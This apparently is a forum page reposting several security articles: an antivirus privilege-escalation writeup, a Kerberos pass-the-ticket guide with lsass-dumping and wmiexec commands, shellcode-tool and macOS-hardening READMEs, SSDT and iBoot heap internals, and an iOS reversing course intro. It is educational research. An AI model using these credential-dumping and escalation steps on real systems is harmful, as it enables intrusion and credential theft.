documentation claims that APFS_TYPE_DIR_REC keys are j_drec_key_t, but actually they can be j_drec_hashed_key_t. - The documentation claims that o_cksum is "The Fletcher 64 checksum of the object", but actually APFS requires that the fletcher64 checksum of all data behind the checksum concatenated with the checksum is zero. (In other words, you cut out the checksum field at the start, append it at the end, then run fletcher64 over the buffer, and then you have to get an all-zeroes checksum.) Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47708.zip Sursa: https://www.exploit-db.com/exploits/47708
  6. A Glimpse into SSDT inside Windows x64 Kernel What is SSDT System Service Dispatch Table or SSDT, simply is an array of addresses to kernel routines for 32 bit operating systems or an array of relative offsets to the same routines for 64 bit operating systems. SSDT is the first member of the Service Descriptor Table kernel memory structure as shown below: typedef struct tagSERVICE_DESCRIPTOR_TABLE { SYSTEM_SERVICE_TABLE nt; //effectively a pointer to Service Dispatch Table (SSDT) itself SYSTEM_SERVICE_TABLE win32k; SYSTEM_SERVICE_TABLE sst3; //pointer to a memory address that contains how many routines are defined in the table SYSTEM_SERVICE_TABLE sst4; } SERVICE_DESCRIPTOR_TABLE; SSDTs used to be hooked by AVs as well as rootkits that wanted to hide files, registry keys, network connections, etc. Microsoft introduced PatchGuard for x64 systems to fight SSDT modifications by BSOD'ing the system. In Human Terms When a program in user space calls a function, say CreateFile, eventually code execution is transfered to ntdll!NtCreateFile and via a syscall to the kernel routine nt!NtCreateFile. Syscall is merely an index in the System Service Dispatch Table (SSDT) which contains an array of pointers for 32 bit OS'es (or relative offsets to the Service Dispatch Table for 64 bit OSes) to all critical system APIs like ZwCreateFile, ZwOpenFile and so on.. Below is a simplified diagram that shows how offsets in SSDT KiServiceTable are converted to absolute addresses of corresponding kernel routines: Effectively, syscalls and SSDT (KiServiceTable) work togeher as a bridge between userland API calls and their corresponding kernel routines, allowing the kernel to know which routine should be executed for a given syscall that originated in the user space. Service Descriptor Table In WinDBG, we can check the Service Descriptor Table structure KeServiceDescriptorTable as shown below. Note that the first member is recognized as KiServiceTable - this is a pointer to the SSDT itself - the dispatch table (or simply an array) containing all those pointers/offsets: 0: kd> dps nt!keservicedescriptortable L4 fffff801`9210b880 fffff801`9203b470 nt!KiServiceTable fffff801`9210b888 00000000`00000000 fffff801`9210b890 00000000`000001ce fffff801`9210b898 fffff801`9203bbac nt!KiArgumentTable Let's try and print out a couple of values from the SSDT: 0: kd> dd /c1 KiServiceTable L2 fffff801`9203b470 fd9007c4 fffff801`9203b474 fcb485c0 As mentioned earlier, on x64 which is what I'm running in my lab, SSDT contains relative offsets to kernel routines. In order to get the absolute address for a given offset, the following formula needs to be applied: RoutineAbsoluteAddress = KiServiceTableAddress + (routineOffset >>> 4)RoutineAbsoluteAddress=KiServiceTableAddress+(routineOffset>>>4) Using the above formula and the first offset fd9007c4 we got from the KiServiceTable, we can work out that this offset is pointing to nt!NtAccessCheck: 0: kd> u KiServiceTable + (0xfd9007c4 >>> 4) nt!NtAccessCheck: fffff801`91dcb4ec 4c8bdc mov r11,rsp fffff801`91dcb4ef 4883ec68 sub rsp,68h fffff801`91dcb4f3 488b8424a8000000 mov rax,qword ptr [rsp+0A8h] fffff801`91dcb4fb 4533d2 xor r10d,r10d We can confirm it if we try to disassemble the nt!NtAccessCheck - routine addresses (fffff801`91dcb4ec) and first instructions (mov r11, rsp) of the above and below commands match: 0: kd> u nt!NtAccessCheck L1 nt!NtAccessCheck: fffff801`91dcb4ec 4c8bdc mov r11,rsp If we refer back to the original drawing on how SSDT offsets are converted to absolute addresses, we can redraw it with specific values for syscall 0x1: Finding a Dispatch Routine for a Given Userland Syscall As a simple exercise, given a known syscall number, we can try to work out what kernel routine will be called once that syscall is issued. Let's load the debugging symbols for ntdll module: .reload /f ntdll.dll lm ntdll Let's now find the syscall for ntdll!NtCreateFile: 0: kd> u ntdll!ntcreatefile L2 ...we can see the syscall is 0x55: Offsets in the KiServiceTable are 4 bytes in size, so we can work out the offset for syscall 0x55 by looking into the value the KiServiceTable holds at position 0x55: 0: kd> dd /c1 kiservicetable+4*0x55 L1 fffff801`9203b5c4 01fa3007 We see from the above that the offset for NtCreateFile is 01fa3007. Using the formula discussed previously for working out the absolute routine address, we confirm that we're looking at the nt!tCreateFile kernel routine that will be called once ntdll!NtCreateFile issues the 0x55 syscall: 0: kd> u kiservicetable + (01fa3007>>>4) L1 nt!NtCreateFile: fffff801`92235770 4881ec88000000 sub rsp,88h Let's redraw the earlier diagram once more for the syscall 0x55 for ntdll!NtCreateFile: Finding Address of All SSDT Routines As another exercise, we could loop through all items in the service dispatch table and print absolute addresses for all routines defined in the dispatch table: .foreach /ps 1 /pS 1 ( offset {dd /c 1 nt!KiServiceTable L poi(keservicedescriptortable+0x10) }){ dp kiservicetable + ( offset >>> 4 ) L1 } Nice, but not very human readable. We can update the loop a bit and print out the API names associated with those absolute addresses: 0: kd> .foreach /ps 1 /pS 1 ( offset {dd /c 1 nt!KiServiceTable L poi(nt!KeServiceDescriptorTable+10)}){ r $t0 = ( offset >>> 4) + nt!KiServiceTable; .printf "%p - %y\n", $t0, $t0 } fffff80191dcb4ec - nt!NtAccessCheck (fffff801`91dcb4ec) fffff80191cefccc - nt!NtWorkerFactoryWorkerReady (fffff801`91cefccc) fffff8019218df1c - nt!NtAcceptConnectPort (fffff801`9218df1c) fffff801923f8848 - nt!NtMapUserPhysicalPagesScatter (fffff801`923f8848) fffff801921afc10 - nt!NtWaitForSingleObject (fffff801`921afc10) fffff80191e54010 - nt!NtCallbackReturn (fffff801`91e54010) fffff8019213cf60 - nt!NtReadFile (fffff801`9213cf60) fffff801921b2e80 - nt!NtDeviceIoControlFile (fffff801`921b2e80) fffff80192212dc0 - nt!NtWriteFile (fffff801`92212dc0) .....cut for brewity..... References The Quest for the SSDTs The much talked about Kernel data structures www.codeproject.com .printf - Windows drivers The .printf token behaves like the printf statement in C. docs.microsoft.com .foreach - Windows drivers The .foreach token parses the output of one or more debugger commands and uses each value in this output as the input to one or more additional commands. docs.microsoft.com Sursa: https://ired.team/miscellaneous-reversing-forensics/windows-kernel/glimpse-into-ssdt-in-windows-x64-kernel
  7. macOS Lockdown (mOSL) Bash script to audit and fix macOS Catalina (10.15.x) security settings Inspired by and based on Lockdown by Patrick Wardle and osxlockdown by Scott Piper. Warnings mOSL is being rewritten in Swift and the Bash version will be deprecated.. See: "The Future of mOSL". Always run the latest release not the code in master! This script will only ever support the latest macOS release This script requires your password to invoke some commands with sudo brew tap: 0xmachos/homebrew-mosl To install mOSL via brew execute: brew tap 0xmachos/homebrew-mosl brew install mosl mOSL will then be available as: Lockdown Threat Model(ish) The main goal is to enforce already secure defaults and apply more strict non-default options. It aims to reduce attack surface but it is pragmatic in this pursuit. The author utilises Bluetooth for services such as Handoff so it is left enabled. There is no specific focus on enhancing privacy. Finally, mOSL will not protect you from the FSB, MSS, DGSE, or FSM. Full Disk Access Permission In macOS Mojave and later certain application data is protected by the OS. For example, if Example.app wishes to access Contacts.app data Example.app must be given explicit permission via System Preferences > Security & Privacy > Privacy. However some application data cannot be accessed via a specific permission. Access to this data requires the Full Disk Access permission. mOSL requires that Terminal.app be given the Full Disk Access permission. It needs this permission to audit/fix the following settings: disable mail remote content disable_auto_open_safe_downloads These are currently the only settings which require Full Disk Access. It is not possible to programatically get or prompt for this permission, it must be manually given by the user. To give Terminal.app Full Disk Access: System Preferences > Security & Privacy > Privacy > Full Disk Access > Add Terminal.app Once you are done with mOSL you can revoke Full Disk Access for Terminal.app. There's a small checkbox next to Terminal which you can uncheck to revoke the premssion without entirely removing Terminal.app from the list. More info on macOS's new permission model: Working with Mojave’s Privacy Protection by Howard Oakley TCC Round Up by Carl Ashley WWDC 2018 Session 702 Your Apps and the Future of macOS Security Verification The executable Lockdown file can be verified with Minisign: minisign -Vm Lockdown -P RWTiYbJbLl7q6uQ70l1XCvGExizUgEBNDPH0m/1yMimcsfgh542+RDPU Install via brew: brew install minisign Usage $ ./Lockdown Audit or Fix macOS security settings🔒🍎 Usage: ./Lockdown [list | audit {setting_index} | fix {setting_index} | debug] list - List settings that can be audited/ fixed audit - Audit the status of all or chosen setting(s) (Does NOT change settings) fix - Attempt to fix all or chosen setting(s) (Does change settings) fix-force - Same as 'fix' however bypasses user confirmation prompt (Can be used to invoke Lockdown from other scripts) debug - Print debug info for troubleshooting Settings See Commands.md for a easy to read list of commands used to audit/ fix the below settings. Settings that can be audited/ fixed: [0] enable automatic system updates [1] enable automatic app store updates [2] enable gatekeeper [3] enable firewall [4] enable admin password preferences [5] enable terminal secure entry [6] enable sip [7] enable filevault [8] disable firewall builin software [9] disable firewall downloaded signed [10] disable ipv6 [11] disable mail remote content [12] disable remote apple events [13] disable remote login [14] disable auto open safe downloads [15] set airdrop contacts only [16] set appstore update check daily [17] set firmware password [18] check kext loading consent [19] check efi integrity [20] check if standard user Sursa: https://github.com/0xmachos/mOSL
  8. Anti-virus Exploitation: Local Privilege Escalation in K7 Security (CVE-2019-16897) Exploit Development antivirus windows reverseengineering Nov 24 1 / 1 Nov 25 21h ago dtmwaifu pillow collector 21h Anti-virus Exploitation Hey guys, long time no article! Over the past few months, I have been looking into exploitation of anti-viruses via logic bugs. I will briefly discuss the approach towards performing vulnerability research of these security products using the vulnerability I discovered in K7 Security as an example. Disclaimer: I do not claim to know everything about vulnerability research nor exploitation so if there are errors in this article, please let me know. Target Selection Security products such as anti-viruses are an attractive target (at least for me) because they operate in a trusted and privileged context in both the kernel, as a driver, and userland, as a privileged service. This means that they have the ability to facilitate potential escalation of privilege or otherwise access privileged functionality. They have a presence in the low-privileged space of the operating system. For example, there may exist a UI component with which the user can interact, sometimes allowing options to be changed such as enabling/disabling anti-virus, adding directory or file exclusions, and scanning files for malware. Anti-viruses must also access and perform operations on operating system objects to detect malware, such as reading files, registry keys, memory, etc. as well as being able to do privileged actions to keep the system in a protected state no matter the situation. It is between this trusted, high privilege space and the untrusted, low privileged space where interesting things occur. Attack Surface As aforementioned, anti-viruses live in both sides of the privilege boundary as shown in the following diagram: Untitled Diagram(1).jpg762×401 51.7 KB Whatever crosses the line between high and low privilege represents the attack surface. Let’s look at how this diagram can be interpreted. The user interface shares common operations with the service process which is expected. If the user wants to carry out a privileged action, the service will do it on its behalf, assuming that security checks are passed. If the user wishes to change a setting, they open the user interface and click a button. This is communicated to the service process via some form of inter-process communication (IPC) which will perform the necessary actions, e.g. the anti-virus stores its configuration in the registry and therefore, the service will open the relevant registry key and modify some data. Keep in mind that the registry key is stored in the HKEY_LOCAL_MACHINE hive which is in high privilege space, thus requiring a high privilege process to modify its data. So the user, from low privilege, is able to indirectly modify a high privilege object. One more example. A user can scan for malware through the user interface (of course, what good is an anti-virus if they disallow the user from scanning for malware?). A simple, benign operation, what could go wrong? Since it is the responsibility of the service process to perform the malware scan, the interface communicates the information to the service process to target a file. It must interact with the file in order to perform the scan, i.e. it must locate the file on disk and read its content. If, while the file data has been read and is being scanned for malware, and the anti-virus does not lock the file on disk, it is possible for the malware to be replaced with a symbolic link pointing to a file in a high privileged directory (yes, it is possible), let’s use notepad.exe. When the scan is completed and has been determined to be malware, the service process can delete the file. However, the malware has been replaced with a link to notepad.exe! If the anti-virus does not detect and reject the symbolic link, it will delete notepad.exe without question. This is an example of a Time of Check to Time of Use (TOCTOU) 1 race condition bug. Again, the user, from low privilege, is able to indirectly modify a high privilege object because of the service process acting as a broker. Exploitation This vulnerability allows a low privilege user to modify (almost) arbitrary registry data through the anti-virus’s settings. However, a low privileged user (non administrator) cannot should not be able to change the anti-virus’s settings. Bypassing Administrative Checks To narrow down how this administration check is performed, procmon can be used to identify operating system activity as the settings page is accessed again. This will trigger the anti-virus to recheck the administrative status of the current user while it interacts with the operating system as it is being logged. Of course, since we are low privilege and procmon requires high privilege, it is not practical in a real environment. However, because we control the testing environment, we can allow procmon to run as we have access to an administrator account. Setting promon to filter by K7TSMain as the process name will capture activity performed by the user interface process. When procmon starts to log, attempting to access the settings page again in the UI will trigger procmon to instantly show results: procmon admin check.png1162×491 105 KB It can be seen that the anti-virus stores the administrative check in the registry in AdminNonAdminIsValid. Looking at the value in the Event Properties window shows that it returned 0, meaning that non administrator users are not allowed. But there is a slight problem here. Bonus points if you can spot it. Now that we know where the check is being performed, the next step is bypassing it. procmon shows that the process is running in low privilege space as indicated by the user and the medium integrity meaning that we own the process. If it is not protected, we can simply hook the RegQueryValue function and modify the return value. Attaching to K7TSMain.png815×362 96.9 KB Attempting to attach to the K7TSMain.exe process using x32dbg is allowed! The breakpoint on RegQueryValueExA has been set for when we try to access the settings page again. Triggering RegQueryValueExA breakpoint.png1064×577 101 KB x32dbg catches the breakpoint when the settings page is clicked. The value name being queried is ProductType but we want AdminNonAdminIsValid, so continuing on will trigger the next breakpoint: Breakpoint on AdminNonAdminIsValid.png761×506 41.6 KB Now we can see AdminNonAdminIsValid. To modify the return value, we can allow the function to run until return. However, the calling function looks like a wrapper for RegQueryValueExA: So continuing again until return reveals the culprit function that performs the check: Admin check function.png754×157 11.2 KB There is an obvious check there for the value 1 however, the current returned value for the registry data is 0. This decides the return value of this function so we can either change [esp+4] or change the return value to bypass the check: Bypass admin check.png847×518 23.4 KB Intercepting Inter-process Communication Multiple inter-process communication methods are available on Windows such as mailslots, file mapping, COM, and named pipes. We must figure out which is implemented in the product to be able to analyse the protocol. An easy way to do this is by using API Monitor to log select function calls made by the process. When we do this and then apply a changed setting, we can see references to named pipe functions: image.png1081×513 62.5 KB Note that the calling module is K7AVOptn.dll instead of K7TSMain.exe. If we have a look at the data being communicated through TransactNamedPipe, we can see some interesting information: image.png704×204 13 KB The first thing that pops out is that it looks like a list of extension names (.ocx, .exe, .com) separated with | where some have wildcard matching. This could be a list of extensions to scan for malware. If we have a look at the registry where the anti-virus stores its configuration, we can see something similar under the value ScanExtensions in the RTFileScanner key: image.png820×696 83.5 KB Continuing down the list of calls, one of them contains some very intriguing data: image.png703×415 26.4 KB It looks as though the anti-virus is applying values by specifying (privileged) registry keys and their values by their full key path. The next obvious step is to see if changing one of the keys and their values will work. This can be done by breakpointing on the TransactNamedPipe function in x32dbg: image.png768×551 43.9 KB Once here, locate the input buffer in the second argument and alter the data to add or change a key in the HKEY_LOCAL_MACHINE hive like so: image.png781×172 17.9 KB If it is possible to change this registry key’s values, high privileged processes will be forced to load the DLLs listed in AppInit_DLLs, i.e. one that we control. The LoadAppInit_DLLs value must also be set to 1 (it is 0 by default) to enable this functionality. The result: image.png1008×559 66.7 KB Triggering the Payload You may have noticed that the registry key resides within Wow6432Node which is the 32-bit counterpart of the registry. This is because the product is 32-bit and so Windows will automatically redirect registry changes. In 64-bit Windows, processes are usually 64-bit and so the chances of loading the payload DLL through AppInit_DLLs is unlikely. A reliable way is to make use of the anti-virus because it is 32-bit assuming a privileged component can be launched. The easiest way to do this is to restart the machine because it will reload all of the anti-virus’s processes however, it is not always practical nor is it clean. Clicking around the UI reveals that the update function runs K7TSHlpr.exe under the NT AUTHORITY\SYSTEM user: image.png1427×456 83 KB As it is a 32-bit application, Windows will load our AppInit_DLLs DLL into the process space. image.png856×537 59.5 KB Using system("cmd") as the payload will prompt the user with an interactive session in the context of the NT AUTHORITY\SYSTEM account via the UI0Detect service: Selecting to view the message brings up the following: image.png742×598 13.2 KB We have root! Automated Exploit 9 Link to my GitHub for the advisory and an automated exploit 10. Sursa: https://0x00sec.org/t/anti-virus-exploitation-local-privilege-escalation-in-k7-security-cve-2019-16897/17655
  9. Nytro

    Sickle

    Sickle Sickle is a payload development tool originally created to aid me in crafting shellcode, however it can be used in crafting payloads for other exploit types as well (non-binary). Although the current modules are mostly aimed towards assembly this tool is not limited to shellcode. Sickle can aid in the following: Identifying instructions resulting in bad characters when crafting shellcode Formatting output in various languages (python, perl, javascript, etc). Accepting bytecode via STDIN and formatting it. Executing shellcode in both Windows and Linux environments. Diffing for two binaries (hexdump, raw, asm, byte) Dissembling shellcode into assembly language (ARM, x86, etc). Shellcode extraction from raw bins (nasm sc.asm -o sc) Quick failure check A task I found myself doing repetitively was compiling assembler source code then extracting the shellcode, placing it into a wrapper, and testing it. If it was a bad run, the process would be repeated until successful. Sickle takes care of placing the shellcode into a wrapper for quick testing. (Works on Windows and Unix systems): Recreating shellcode Sometimes you find a piece of shellcode that's fluent in its execution and you want to recreate it yourself to understand its underlying mechanisms. Sickle can help you compare the original shellcode to your "recreated" version. If you're not crafting shellcode and just need 2 binfiles to be the same this feature can also help verifying files are the same byte by byte (multiple modes). Disassembly Sickle can also take a binary file and convert the extracted opcodes (shellcode) to machine instructions. Keep in mind this works with raw opcodes (-r) and STDIN (-r -) as well. In the following example I am converting a reverse shell designed by Stephen Fewer to assembly. Bad character identification Module Based Design This tool was originally designed as a one big script, however recently when a change needed to be done to the script I had to relearn my own code... In order to avoid this in the future I've decided to keep all modules under the "modules" directory (default module: format). If you prefer the old design, I have kept a copy under the Documentation directory. ~# sickle.py -l Name Description ---- ----------- diff Compare two binaries / shellcode(s). Supports hexdump, byte, raw, and asm modes run Execute shellcode on either windows or unix format Format bytecode into desired format / language badchar Generate bad characters in respective format disassemble Disassemble bytecode in respective architecture pinpoint Pinpoint where in shellcode bad characters occur ~# sickle -i -m diff Options for diff Options: Name Required Description ---- -------- ----------- BINFILE yes Additional binary file needed to perform diff MODE yes hexdump, byte, raw, or asm Description: Compare two binaries / shellcode(s). Supports hexdump, byte, raw, and asm modes Sursa: https://github.com/wetw0rk/Sickle
  10. Practical Guide to Passing Kerberos Tickets From Linux Nov 21, 2019 This goal of this post is to be a practical guide to passing Kerberos tickets from a Linux host. In general, penetration testers are very familiar with using Mimikatz to obtain cleartext passwords or NT hashes and utilize them for lateral movement. At times we may find ourselves in a situation where we have local admin access to a host, but are unable to obtain either a cleartext password or NT hash of a target user. Fear not, in many cases we can simply pass a Kerberos ticket in place of passing a hash. This post is meant to be a practical guide. For a deeper understanding of the technical details and theory see the resources at the end of the post. Tools To get started we will first need to setup some tools. All have information on how to setup on their GitHub page. Impacket https://github.com/SecureAuthCorp/impacket pypykatz https://github.com/skelsec/pypykatz Kerberos Client RPM based: yum install krb5-workstation Debian based: apt install krb5-user procdump https://docs.microsoft.com/en-us/sysinternals/downloads/procdump autoProc.py (not required, but useful) wget https://gist.githubusercontent.com/knavesec/0bf192d600ee15f214560ad6280df556/raw/36ff756346ebfc7f9721af8c18dff7d2aaf005ce/autoProc.py Lab Environment This guide will use a simple Windows lab with two hosts: dc01.winlab.com (domain controller) client01.winlab.com (generic server And two domain accounts: Administrator (domain admin) User1 (local admin to client01) Passing the Ticket By some prior means we have compromised the account user1, which has local admin access to client01.winlab.com. A standard technique from this position would be to dump passwords and NT hashes with Mimikatz. Instead, we will use a slightly different technique of dumping the memory of the lsass.exe process with procdump64.exe from Sysinternals. This has the advantage of avoiding antivirus without needing a modified version of Mimikatz. This can be done by uploading procdump64.exe to the target host: And then run: procdump64.exe -accepteula -ma lsass.exe output-file Alternatively we can use autoProc.py which automates all of this as well as cleans up the evidence (if using this method make sure you have placed procdump64.exe in /opt/procdump/. I also prefer to comment out line 107): python3 autoProc.py domain/user@target We now have the lsass.dmp on our attacking host. Next we dump the Kerberos tickets: pypykatz lsa -k /kerberos/output/dir minidump lsass.dmp And view the available tickets: Ideally, we want a krbtgt ticket. A krbtgt ticket allows us to access any service that the account has privileges to. Otherwise we are limited to the specific service of the TGS ticket. In this case we have a krbtgt ticket for the Administrator account! The next step is to convert the ticket from .kirbi to .ccache so that we can use it on our Linux host: kirbi2ccache input.kirbi output.ccache Now that the ticket file is in the correct format, we specify the location of the .ccache file by setting the KRB5CCNAME environment variable and use klist to verify everything looks correct: export KRB5CCNAME=/path/to/.ccache klist We must specify the target host by the fully qualified domain name. We can either add the host to our /etc/hosts file or point to the DNS server of the Windows environment. Finally, we are ready to use the ticket to gain access to the domain controller: wmiexec.py -no-pass -k -dc-ip w.x.y.z domain/user@fqdn Excellent! We were able to elevate to domain admin by using pass the ticket! Be aware that Kerberos tickets have a set lifetime. Make full use of the ticket before it expires! Conclusion Passing the ticket can be a very effective technique when you do not have access to an NT hash or password. Blue teams are increasingly aware of passing the hash. In response they are placing high value accounts in the Protected Users group or taking other defensive measures. As such, passing the ticket is becoming more and more relevant. Resources https://www.tarlogic.com/en/blog/how-kerberos-works/ https://www.harmj0y.net/blog/tag/kerberos/ Thanks to the following for providing tools or knowledge: Impacket gentilkiwi harmj0y SkelSec knavesec Sursa: https://0xeb-bp.github.io/blog/2019/11/21/practical-guide-pass-the-ticket.html
  11. Reverse Engineering iOS Applications Welcome to my course Reverse Engineering iOS Applications. If you're here it means that you share my interest for application security and exploitation on iOS. Or maybe you just clicked the wrong link 😂 All the vulnerabilities that I'll show you here are real, they've been found in production applications by security researchers, including myself, as part of bug bounty programs or just regular research. One of the reasons why you don't often see writeups with these types of vulnerabilities is because most of the companies prohibit the publication of such content. We've helped these companies by reporting them these issues and we've been rewarded with bounties for that, but no one other than the researcher(s) and the company's engineering team will learn from those experiences. This is part of the reason I decided to create this course, by creating a fake iOS application that contains all the vulnerabilities I've encountered in my own research or in the very few publications from other researchers. Even though there are already some projects[^1] aimed to teach you common issues on iOS applications, I felt like we needed one that showed the kind of vulnerabilities we've seen on applications downloaded from the App Store. This course is divided in 5 modules that will take you from zero to reversing production applications on the Apple App Store. Every module is intended to explain a single part of the process in a series of step-by-step instructions that should guide you all the way to success. This is my first attempt to creating an online course so bear with me if it's not the best. I love feedback and even if you absolutely hate it, let me know; but hopefully you'll enjoy this ride and you'll get to learn something new. Yes, I'm a n00b! If you find typos, mistakes or plain wrong concepts please be kind and tell me so that I can fix them and we all get to learn! Version: 1.1 Modules Prerequisites Introduction Module 1 - Environment Setup Module 2 - Decrypting iOS Applications Module 3 - Static Analysis Module 4 - Dynamic Analysis and Hacking Module 5 - Binary Patching Final Thoughts Resources EPUB Download Thanks to natalia-osa's brilliant idea, there's now a .epub version of the course that you can download from here. As Natalia mentioned, this is for easier consumption of the content. Thanks again for this fantastic idea, Natalia 🙏🏼. License Copyright 2019 Ivan Rodriguez <ios [at] ivrodriguez.com> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Donations I don't really accept donations because I do this to share what I learn with the community. If you want to support me just re-share this content and help reach more people. I also have an online store (nullswag.com) with cool clothing thingies if you want to get something there. Disclaimer I created this course on my own and it doesn't reflect the views of my employer, all the comments and opinions are my own. Disclaimer of Damages Use of this course or material is, at all times, "at your own risk." If you are dissatisfied with any aspect of the course, any of these terms and conditions or any other policies, your only remedy is to discontinue the use of the course. In no event shall I, the course, or its suppliers, be liable to any user or third party, for any damages whatsoever resulting from the use or inability to use this course or the material upon this site, whether based on warranty, contract, tort, or any other legal theory, and whether or not the website is advised of the possibility of such damages. Use any software and techniques described in this course, at all times, "at your own risk", I'm not responsible for any losses, damages, or liabilities arising out of or related to this course. In no event will I be liable for any indirect, special, punitive, exemplary, incidental or consequential damages. this limitation will apply regardless of whether or not the other party has been advised of the possibility of such damages. Privacy I'm not personally collecting any information. Since this entire course is hosted on Github, that's the privacy policy you want to read. [^1] I love the work @prateekg147 did with DIVA and OWASP did with iGoat. They are great tools to start learning the internals of an iOS application and some of the bugs developers have introduced in the past, but I think many of the issues shown there are just theoretical or impractical and can be compared to a "self-hack". It's like looking at the source code of a webpage in a web browser, you get to understand the static code (HTML/Javascript) of the website but any modifications you make won't affect other users. I wanted to show vulnerabilities that can harm the company who created the application or its end users. Sursa: https://github.com/ivRodriguezCA/RE-iOS-Apps
  12. iBoot heap internals This research note provides a basic technical outline of the Apple bootchain's heap internals, key algorithms, and security mitigations. This heap implementation is commonly at work at all stages of the boot procedure of iPhones and other Apple devices, and particularly by SecuROM and iBoot. SecuROM (Apple's 1st stage bootloader) and iBoot (the 2nd stage bootloader) are the two most important targets of jailbreaking efforts, as they form the basic tier of the cryptographic verification foundation on which Apple's entire Secure Boot procedure stands. In general, understanding of the bootchain's heap internals is essential to exploitation of heap-based memory corruption vulnerabilities in any of the boot loaders. Aside from jailbreaking, the Apple's bootchain heap makes a perfect specimen for a generalized study of heap implementations, because it's classical, simple and compact, while still maintaining all the commonly recommended security mitigation techniques. General tendencies of heap placement within the device's address space were discussed in my previous researh note: iBoot address space. Overview Apple's bootchain uses a classical heap implementation based on free lists, enhanced with immediate coalescing and security mitigations. It is very simple compared to various well-researched kernel and userland heap implementations, such as the Low Fragmentation Heap in Microsoft Windows, or Linux's glibc. Each stage of the bootchain receives its own heap. In practice there may be 1-2 heaps backing runtime memory requirements of the booting code, depending on the platfrom and the boot stage. Bootchain's heap implementation exposes a standard set of memory management APIs: malloc, calloc, realloc, memalign, free, and memcpy / memset. Initialization Heap is initialized in each stage's system initialization routine, immediately after various bootstrapping tasks are completed, such as code and data relocation. Heap size, number of heaps and their placement are device-specific, submodel-specific and stage-specific, although some general tendencies may be observed. [1] The initialization routine receives a contiguous piece of physical memory which is designated for the heap, and adds it to the largest bin's free-list. Heap roots - initial heap handles and bin pointers from which free lists are walked - are maintained in the data section. Allocations and frees Bootchain's heap allocator is based on the classical first-fit free-list algorithm with 30 bins and immediate coalescing. New heap chunks requested by malloc() are either allocated contiguously from the slab (represented with some larger free chunk than requested), or re-used from the free-list. Only the free-list based allocator is used; there are no dedicated fast-bins or a large-chunk allocator that are commonly found in more advanced heap implementations. On allocation, the free list of the appropriate (by size) bin is iterated, and the first free chunk that accomodates the requested size is assigned to the allocation. Unneeded free space in that chunk is chopped off and returned to the appropriate bin. A freed heap chunk is added at the top of the respective bin. If the adjacent chunk is free, the two chunks are immediately coalesced and moved to the respective bin's free-list. Free-lists and bins Free heap chunks are sorted by size and stored into 30 bins, numbered 2 through 31. Each bin is represented with a global variable in the data section, that holds the topmost item of the free-list for that bin. A free-list is a simple doubly-linked list. Free-list's previous and next pointers are appended to each heap chunk's metadata header upon a free() operation. Free-lists are walked on each allocation request, starting from the top of the bin which is appropriate to the requested size of the allocation. Heap chunk sizes are measured in and rounded to 64-byte units (2^6), including a 64-byte metadata header and reserved space for freelist pointers. For example, given the minimum requested allocation size of 1 byte, in practice will result in 128 bytes being allocated from the heap. Bins sort the chunks by powers of 2. Bins: 30, 2 through 31 0 => 0-63 (2^6-1) - never happens 1 => 64-127 (2^7-1) - never happens 2 => 128-255 byte chunks 3 => 256-511 byte chunks 4 => 512-1023 byte chunks ... etc., up to 31. Note: Bins 0 and 1 exist, but they are never used in practice due to allocation size constraints. Metadata Each heap chunk has a metadata header prepended, which has a size of 64 bytes, both on 32-bit and 64-bit systems. The header contains a 64-bit checksum, followed by a standard set of information fields: size and busy/free status of the current and the previous chunk. Free chunks have an additional 2*size_t metadata block appended to the header, that holds the pointers to the previous and the next free chunk in the bin, used during walking the free-lists. Security mitigations Bootchain's heap implementation employs several well-known security mitigations in order to detect random heap corruptions and harden exploit development for heap-based vulnerabilities. 1. Heap uses a 128-bit random cookie which is stored in the data section. The cookie is used for initial randomization of the heap placement and verification of heap metadata checksums. On older devices (A7 and earlier) SecuROM and LLB use a statically initialized heap cookie: [ 0x64636b783132322f, 0xa7fa3a2e367917fc ]. Note: the cookie is placed at the top of the data section, as the heap is initialized early. It will not be corrupted by a data-to-heap overflow. 2. Initial heap placement may be randomized with 24 bits of entropy, resulting in a random shift of the heap arena by at most 0x3ffc0 bytes against the data section or wherever else it is placed. In LLB and SecuROM the shift is not randomized on older devices (up to and inclusive A7). 3. There is no runtime randomization in the allocation algorithm. All heap chunk addresses returned by malloc() are deterministic with respect to the heap base, as they are popped from the appropriate free-list in FIFO manner. 4. Metadata checksum verification. To prevent heap chunk metadata corruption due to a heap overflow, a chunk's checksum is verified on each heap operation, and will cause an immediate panic if the checksum was corrupted. In addition, an extended heap verification occurs prior to executing the next stage bootloader. The checksum is calculated from the chunk's metadata based on the SipHash algorithm, using the heap cookie as a pseudo-random secret key. Due to the heap cookie being deterministic on A7 and prior SoCs' LLB and SecuROM, the checksum is deterministic and heap overflow attacks are trivial in that particular case. On more recent devices, cross-chunk overflow attacks may still be possible, provided that the vulnerability is pivoted to the shellcode before any heap APIs are called. Since heap usage is not very high in the bootchain, this is realistic. 5. Padding verification. Extra bytes of the chunk beyond the user's requested size are padded with a simple rotating pattern, generated by a function of the user's requested size. This mitigation helps to detect casual heap corruptions, but has near-zero impact on exploit development complexity, since the attacker commonly controls the user's size of the overflowing chunk. 6. Safe unlinking is in place. Free-list pointers are cross-checked against the previous and the next chunk on each free-list operation. A chunk's size is checked against the previous chunk's next_chunk size. 7. Double-frees are detected by verifying the current chunk's free bit in the metadata header. 8. Freed chunks are zeroed. Thus a typical use-after-free vulnerability will manifest itself as a null-pointer dereference upon a random crash. This has no impact on exploit development. 9. All new allocations are zero-initialized. This closes much of the opportunity for memory disclosure attacks via an uninitialized heap variable vulnerability. 10. Zero-sized allocations are not permitted, and will result in a panic. 11. Negatively sized allocations due to an integer underflow/overflow are possible. They are less likely on 